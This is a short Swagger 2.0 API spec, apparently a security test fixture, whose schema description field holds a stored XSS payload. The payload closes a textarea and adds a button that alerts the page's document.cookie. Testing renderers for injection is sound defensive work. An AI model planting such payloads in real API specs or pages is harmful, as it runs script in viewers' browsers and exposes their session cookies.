swagger: '2.0'
info:
  title: Alert Test
  version: 1.0.0
definitions:
  User:
    type: object
    properties:
      name:
        type: string
        description: |
          </textarea>
          <button onclick="alert('XSS from schema description!\n' + document.cookie)">Click Me</button>
